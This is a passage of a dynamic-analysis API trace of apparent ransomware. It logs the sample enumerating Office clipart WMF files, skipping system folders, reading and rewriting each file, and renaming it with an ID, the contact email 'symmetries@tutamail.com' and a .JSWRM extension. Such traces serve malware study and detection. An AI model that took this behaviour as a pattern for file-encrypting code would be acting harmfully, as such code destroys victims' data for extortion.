lstrcmpiW (lpString1="PE00489_.WMF", lpString2="system volume information") returned -1 [0092.823] lstrcmpiW (lpString1="PE00489_.WMF", lpString2="msocache") returned 1 [0092.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0092.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00489_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00489_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00489_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0092.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00489_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00489_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00489_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0092.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00489_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00489_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.824] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=81964) returned 1 [0092.824] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14020) returned 0x24d210 [0092.824] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x14020, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x14020, lpOverlapped=0x0) returned 1 [0092.845] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.845] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x14020, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x14020, lpOverlapped=0x0) returned 1 [0092.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.858] CloseHandle (hObject=0x314) returned 1 [0092.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0092.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0092.858] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0092.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0092.858] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0092.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0092.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.858] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00489_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00489_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00489_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00489_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0092.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0092.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.859] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ee4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00531_.WMF", cAlternateFileName="")) returned 1 [0092.859] lstrcmpiW (lpString1="PE00531_.WMF", lpString2=".") returned 1 [0092.859] lstrcmpiW (lpString1="PE00531_.WMF", lpString2="..") returned 1 [0092.860] lstrcmpiW (lpString1="PE00531_.WMF", lpString2="...") returned 1 [0092.860] lstrcmpiW (lpString1="PE00531_.WMF", lpString2="windows") returned -1 [0092.860] lstrcmpiW (lpString1="PE00531_.WMF", lpString2="recovery") returned -1 [0092.860] lstrcmpiW (lpString1="PE00531_.WMF", lpString2="perflogs") returned -1 [0092.860] lstrcmpiW (lpString1="PE00531_.WMF", lpString2="documents and settings") returned 1 [0092.860] lstrcmpiW (lpString1="PE00531_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.860] lstrcmpiW (lpString1="PE00531_.WMF", lpString2="system volume information") returned -1 [0092.860] lstrcmpiW (lpString1="PE00531_.WMF", lpString2="msocache") returned 1 [0092.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0092.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00531_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00531_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00531_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0092.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0092.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00531_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00531_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00531_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0092.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0092.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0092.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00531_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00531_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.867] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7908) returned 1 [0092.867] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ee0) returned 0x205850 [0092.867] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ee0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ee0, lpOverlapped=0x0) returned 1 [0092.869] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.869] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ee0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ee0, lpOverlapped=0x0) returned 1 [0092.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.869] CloseHandle (hObject=0x314) returned 1 [0092.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0092.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.869] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.869] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0092.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0092.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0092.870] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0092.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0092.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.870] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00531_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00531_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00531_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00531_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0092.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0092.870] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0092.871] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10123d5b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10123d5b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10123d5b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8da8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00542_.WMF", cAlternateFileName="")) returned 1 [0092.871] lstrcmpiW (lpString1="PE00542_.WMF", lpString2=".") returned 1 [0092.871] lstrcmpiW (lpString1="PE00542_.WMF", lpString2="..") returned 1 [0092.871] lstrcmpiW (lpString1="PE00542_.WMF", lpString2="...") returned 1 [0092.871] lstrcmpiW (lpString1="PE00542_.WMF", lpString2="windows") returned -1 [0092.871] lstrcmpiW (lpString1="PE00542_.WMF", lpString2="recovery") returned -1 [0092.871] lstrcmpiW (lpString1="PE00542_.WMF", lpString2="perflogs") returned -1 [0092.871] lstrcmpiW (lpString1="PE00542_.WMF", lpString2="documents and settings") returned 1 [0092.871] lstrcmpiW (lpString1="PE00542_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.871] lstrcmpiW (lpString1="PE00542_.WMF", lpString2="system volume information") returned -1 [0092.871] lstrcmpiW (lpString1="PE00542_.WMF", lpString2="msocache") returned 1 [0092.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0092.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00542_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00542_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00542_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0092.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0092.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00542_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00542_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00542_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0092.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0092.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0092.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0092.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00542_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00542_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.872] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=36264) returned 1 [0092.872] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8da0) returned 0x24d210 [0092.873] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8da0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8da0, lpOverlapped=0x0) returned 1 [0092.877] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.877] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8da0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8da0, lpOverlapped=0x0) returned 1 [0092.877] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0092.878] CloseHandle (hObject=0x314) returned 1 [0092.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0092.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0092.878] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.878] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0092.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0092.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0092.879] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0092.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0092.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0092.879] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00542_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00542_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00542_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00542_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0092.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0092.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0092.879] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10149fbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10149fbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10149fbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x140c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE00555_.WMF", cAlternateFileName="")) returned 1 [0092.880] lstrcmpiW (lpString1="PE00555_.WMF", lpString2=".") returned 1 [0092.880] lstrcmpiW (lpString1="PE00555_.WMF", lpString2="..") returned 1 [0092.880] lstrcmpiW (lpString1="PE00555_.WMF", lpString2="...") returned 1 [0092.880] lstrcmpiW (lpString1="PE00555_.WMF", lpString2="windows") returned -1 [0092.880] lstrcmpiW (lpString1="PE00555_.WMF", lpString2="recovery") returned -1 [0092.880] lstrcmpiW (lpString1="PE00555_.WMF", lpString2="perflogs") returned -1 [0092.880] lstrcmpiW (lpString1="PE00555_.WMF", lpString2="documents and settings") returned 1 [0092.880] lstrcmpiW (lpString1="PE00555_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.880] lstrcmpiW (lpString1="PE00555_.WMF", lpString2="system volume information") returned -1 [0092.880] lstrcmpiW (lpString1="PE00555_.WMF", lpString2="msocache") returned 1 [0092.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0092.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00555_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00555_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00555_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0092.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0092.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00555_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE00555_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE00555_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0092.880] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.880] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0092.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 